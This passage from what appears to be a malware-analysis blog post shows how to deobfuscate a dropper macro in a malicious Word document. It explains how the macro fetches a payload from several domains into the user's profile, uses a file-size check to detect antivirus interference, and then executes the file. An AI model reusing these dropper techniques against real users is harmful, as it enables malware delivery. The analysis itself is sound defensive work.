There is still a fair amount of junk incorporated into this Visual Basic code. The author has defined a lot of the important components as variables, with names that give us no indication as to what they do. He has also included some junk variables to bulk out the code, so let’s remove those first.
Defined variables which only appear once in the code and appear to have no meaningful value are junk variables; those are the ones we want to remove. Below are some of the junk variables from the code, note how they all fit a similar pattern. Removing these is not strictly necessary, but it does help us tidy up the code a little.
The next thing we want to do is give the important variables meaningful names. We do this by copying the name of a variable; let’s take $v83846 as an example. If we do a find and replace (Ctrl+F) we can see this variable is called twice. Focus on the image below, which shows the two occurrences of the variable.
When the variable $v83846 is first defined, we see a bunch of URLs bundled together separated by the “@” symbol, and at the end of the statement there is a split on the “@” symbol. The author has bundled the URLs together and used the split function so that each URL is treated as an individual entry. We can safely assume that the variable $v83846 is a list of websites, so we can rename it to something more useful like “sitelist“.
Highlighted variable renamed to sitelist.
We then see a foreach statement, which again refers to our previously defined variable, followed by a try statement where it appears to be downloading a file. It is clear the code is trying to download a file, and it has a number of sites from which it will try to download it.
If we rename all of the useful variables, we should end up with something as shown below. This gives us a much better picture of what’s going on.
Code after useful variables renamed and tidying.
The script is attempting to download a file called 656 from one of the five different domains stored in the site list. It’s going to download the file into the user’s home directory (as defined by “userprofile“) and, if the file is of a certain size (around 30MB), it’s going to attempt to invoke/execute it. The reason for checking the file size is to determine whether the file downloaded successfully or was stopped by antivirus.
This kind of VBA script is known as a dropper; its sole purpose is to download additional malware onto the user’s device. Using malicious macros embedded in Word documents sent via email is a technique used heavily by Emotet, a prevalent malware campaign which in recent months has become a common way of spreading other malware.
Conclusion
That brings us to the end of this post. Hopefully, you’ll now have a better idea of how you can use open-source tools to analyse malicious Office documents. Malicious documents attached to emails are still an effective and heavily used technique to spread malware.